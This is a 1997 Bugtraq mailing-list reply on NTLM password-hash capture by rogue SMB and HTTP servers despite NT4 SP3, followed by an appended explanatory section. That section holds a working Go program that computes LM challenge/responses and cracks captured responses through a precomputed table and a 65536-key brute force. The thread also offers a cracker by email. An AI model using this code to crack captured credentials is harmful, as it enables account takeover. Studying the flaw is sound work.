Bugtraq mailing list archives

Re: NT4.0 SP3 Still vulnerable


From: pokee () MAXWELL EE WASHINGTON EDU (Aaron Spangler)
Date: Fri, 16 May 1997 09:41:32 PDT


From: "Rubens Kuhl Jr." <rkuhljr () pueridomus br>
To: "Aaron Spangler" <pokee () MAXWELL EE WASHINGTON EDU>, <BUGTRAQ () NETSPACE ORG>
Subject: Re: NT4.0 SP3 Still vulnerable
Date: Thu, 15 May 1997 22:15:43 -0300

As far as I know, IE 3.02 corrected only sending NTLM logins through HTTP
connections, and I suppose you are talking about capturing
username/password hashes sent via SMB/CIFS (file://aaa.bbb.ccc.ddd).

I have a second site setup to grab usernames/password hashes via NTLM over
HTTP.   IE 3.02 is STILL NOT IMMUNE TO THIS.   (Paul Ashton's Bug)


I'm still downloading SP3, but after a look at the readme it looked to me that
SP3 could empower an administrator to fix such a bug by enabling the SMB
signing feature; it would not fix it at installation.

Not true.  Take a look at

 ftp://ftp.microsoft.com/developr/drg/CIFS/CIFS-Auth.doc

Even Message Signing does NOT help in this case.  The client still sends
the password before message signing starts.  This is because the Password
is the "Key" used for message signing!  Rogue servers can still grab
password hashes the same old way!

And with or without SP3, filtering routers blocking ports 135/137/138/139
limit this exploit and similar ones to intranets.

Even if you block ports 135/137/138/139, NTLM over HTTP is STILL VULNERABLE
because it is over port 80!  (the HTTP port)


Hasn't an exploit been released to SAMBA-DIGEST?  It captures the
password hashes, which someone could pass to l0phtcrack and similar
crackers.

It might be.  I have not read it yet.  One important thing to note, though,
is that in order to use l0phtcrack or NTcrack or Crack50-NT, one needs to
modify the code, because the password grabbed from NTLM over HTTP or the
password grabbed from SMB (CIFS) is DOUBLY encrypted.  I have written a
cracker which I suspect is similar to Crack50-NT in speed, because I have
some speedups: I only have to do one Crypt and then a table lookup to break
most of the doubly encrypted LM hash.

Other exploits such as real-time password cracking haven't been released,
but I'm not sure if such a release would make Microsoft go faster.

I do have one, but I am not going to post the URL, or my web server will be
overloaded.  If anyone is interested in this, send me email and I will
give you the URL.

I think that's why BugTraq exists.

Rubens Kuhl Jr.

What would we do without BugTraq?

Thanks,

- Aaron

--
Aaron Spangler                 EE Unix System Administrator
Electrical Engineering FT-10        pokee () ee washington edu
University of Washington            Phone    (206) 543-8984
Box 352500                             or    (206) 543-2523
Seattle, WA 98195-2500              Fax      (206) 543-3842
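The following is an added worked example and is not code from this thread, from Aaron's cracker, or from Microsoft's CIFS-Auth.doc. It reproduces the LM challenge/response computation the thread calls "doubly encrypted" (the LM hash of the password, then that hash used as three DES keys over the server's 8-byte challenge) and shows why a rogue server helps the attacker: because the server chooses the challenge, it can reuse one fixed value, precompute the first response block for a wordlist once, and crack every captured response by table lookup; the third block depends on only two hash bytes, so it falls to 65536 guesses. The challenge bytes, the victim password "Secret12" and the four-entry wordlist are constructed for the example; the speedups shown are generic observations about the LM scheme, not a claim about how Aaron's cracker works.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// Added example, not from the original post. Assumes the LM scheme as documented
// publicly: LM hash = DES("KGS!@#$%") under each 7-byte half of the uppercased,
// 14-byte-padded password; LM response = hash padded to 21 bytes, split into
// three 7-byte DES keys, each encrypting the 8-byte server challenge.

// lmKey spreads 7 key bytes over 8 bytes; DES ignores the low (parity) bit of each.
func lmKey(k []byte) []byte {
	return []byte{
		k[0], k[0]<<7 | k[1]>>1, k[1]<<6 | k[2]>>2, k[2]<<5 | k[3]>>3,
		k[3]<<4 | k[4]>>4, k[4]<<3 | k[5]>>5, k[5]<<2 | k[6]>>6, k[6] << 1,
	}
}

// desBlock encrypts one 8-byte block under a 7-byte key.
func desBlock(key7, block []byte) []byte {
	c, err := des.NewCipher(lmKey(key7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// lmHash: uppercase, pad/truncate to 14 bytes, encrypt the constant under each
// half. The two halves are independent, so a 14-char password is two 7-char ones.
func lmHash(password string) []byte {
	p := []byte(strings.ToUpper(password))
	if len(p) > 14 {
		p = p[:14]
	}
	p = append(p, make([]byte, 14-len(p))...)
	magic := []byte("KGS!@#$%")
	return append(desBlock(p[:7], magic), desBlock(p[7:], magic)...)
}

// lmResponse is the "doubly encrypted" value the client sends: the 16-byte hash
// padded with five zero bytes to 21 and used as three DES keys over the challenge.
func lmResponse(hash16, challenge []byte) []byte {
	k := append(append([]byte{}, hash16...), make([]byte, 5)...)
	var resp []byte
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desBlock(k[i:i+7], challenge)...)
	}
	return resp
}

// firstHalf is the part of a password that determines response bytes 0..7.
func firstHalf(pw string) string {
	u := strings.ToUpper(pw)
	if len(u) > 7 {
		return u[:7]
	}
	return u
}

// lmTable precomputes, for one fixed challenge, response bytes 0..7 of every
// candidate. A rogue server that always sends that challenge can then crack
// every capture with a map lookup instead of DES work per victim.
func lmTable(challenge []byte, candidates []string) map[string]string {
	t := make(map[string]string)
	for _, c := range candidates {
		h := lmHash(c)
		t[hex.EncodeToString(desBlock(h[:7], challenge))] = firstHalf(c)
	}
	return t
}

// crackFirstHalf looks up the first 8 bytes of a captured response.
func crackFirstHalf(response []byte, table map[string]string) (string, bool) {
	s, ok := table[hex.EncodeToString(response[:8])]
	return s, ok
}

// crackHashTail recovers hash bytes 14..15 from response bytes 16..23: the third
// DES key is two hash bytes plus five zeros, so at most 65536 trials are needed.
func crackHashTail(response, challenge []byte) []byte {
	key := make([]byte, 7)
	for i := 0; i < 65536; i++ {
		key[0], key[1] = byte(i>>8), byte(i)
		if bytes.Equal(desBlock(key, challenge), response[16:24]) {
			return []byte{key[0], key[1]}
		}
	}
	return nil
}

func main() {
	// Constructed scenario: the rogue server always sends this challenge.
	challenge := []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef}
	captured := lmResponse(lmHash("Secret12"), challenge) // what the victim's client sends
	table := lmTable(challenge, []string{"password", "letmein", "secret12", "admin"})
	half, ok := crackFirstHalf(captured, table)
	fmt.Printf("captured response: %s\n", hex.EncodeToString(captured))
	fmt.Printf("first 7 chars: %q (found=%v)\n", half, ok)
	fmt.Printf("hash bytes 14..15: %x\n", crackHashTail(captured, challenge))
}
```

Message signing does not change any of this: the response above is computed and sent before signing starts, and the signing key is derived from the same password, which is the point made in the thread. With a server-chosen challenge the attacker's per-victim cost is a lookup; only a client-contributed nonce (as in later NTLMv2) takes that away.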
